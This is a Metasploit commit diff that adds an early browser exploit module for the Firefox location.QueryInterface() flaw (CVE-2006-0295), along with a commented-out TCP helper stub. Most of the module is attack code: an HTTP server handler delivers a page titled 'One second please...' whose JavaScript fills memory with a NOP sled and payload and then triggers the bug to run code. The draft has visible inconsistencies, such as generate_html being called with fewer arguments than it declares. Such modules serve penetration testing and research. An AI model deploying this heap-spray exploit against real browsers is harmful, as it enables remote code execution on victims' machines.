More aux, first hack on multi-target firefox exploit

git-svn-id: file:///home/svn/incoming/trunk@3565 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/auxiliary/tcp.rb

@@ -0,0 +1,15 @@
+#module Msf
+#
+###
+#
+# This module provides methods for establish a connection to a remote host and
+# communicating with it.
+#
+###
+#module Auxiliary::Remote::Tcp
+#
+#	include Exploit::Remote::Tcp
+#
+#end
+#end
+

modules/exploits/multi/firefox_queryinterface.rb

@@ -0,0 +1,140 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Multi::Browser::Firefox_QueryInterface < Msf::Exploit::Remote
+
+	#
+	# This module acts as an HTTP server
+	#
+	include Exploit::Remote::HttpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Firefox location.QueryInterface() Code Execution (Mac OS X)',
+			'Description'    => %q{
+				This module exploits a code execution vulnerability in the Mozilla
+			Firefox browser. To reliably exploit this vulnerability, we need to fill
+			almost a gigabyte of memory with our nop sled and payload. This module has
+			been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
+
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'hdm', 
+				],
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					['CVE', '2006-0295'],
+					['BID', '16476'],
+					['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
+				],
+			'Payload'        =>
+				{
+					'Space'    => 1000 + (rand(256).to_i * 4),
+					'BadChars' => "\x00",
+				},
+			'Targets'        =>
+				[
+					[ 'Firefox 1.5.0.0 Mac OS X', 
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_PPC 
+						}
+					],
+
+					[ 'Firefox 1.5.0.0 Linux', 
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86, 
+						}
+					],
+				],
+			'DisclosureDate' => 'Feb 02 2006'
+			))
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+	
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response(cli, generate_html(p), { 'Content-Type' => 'text/html' })
+		
+		handler(cli)
+	end
+	
+	def generate_html(payload, target)
+
+		enc_code = unescape_encode(payload.encoded)
+		enc_nops = unescape_encode(make_nops(4))
+
+		return %Q|
+<html>
+<head>
+        <title>One second please...</title>
+        <script language="javascript">
+
+                function BodyOnLoad() {
+                        h = FillHeap();
+                        location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
+                };
+
+                function FillHeap() {
+                        // Filler
+                        var m = "";
+                        var h = "";
+                        var a = 0;
+
+                        // Nop sled
+                        for(a=0; a<(1024*256); a++)
+                                m += unescape("#{enc_nops}");
+
+                        // Payload
+                        m += unescape("#{enc_code}");
+
+                        // Repeat
+                        for(a=0; a<1024; a++)
+                                h += m;
+
+                        // Return
+                        return h;
+                }
+        </script>
+</head>
+<body onload="BodyOnLoad()">
+</body>
+</html>
+		|
+	end
+
+	def unescape_encode(data)
+		data << "\x41" if (data % 2 != 0)
+		dptr = 0
+		buff = ''
+		while (dptr < data.length)
+			c1 = data[dptr]
+			dptr += 1
+			c2 = data[dptr]
+			dptr += 1
+			
+			if (Rex::Arch.endian(target.arch) == ENDIAN_LITTLE)
+				buff << sprintf('%%u%.2x%.2x', c2, c1)
+			else
+				buff << sprintf('%%u%.2x%.2x', c1, c2)
+			end
+		end
+		return buff
+	end
+
+end
+end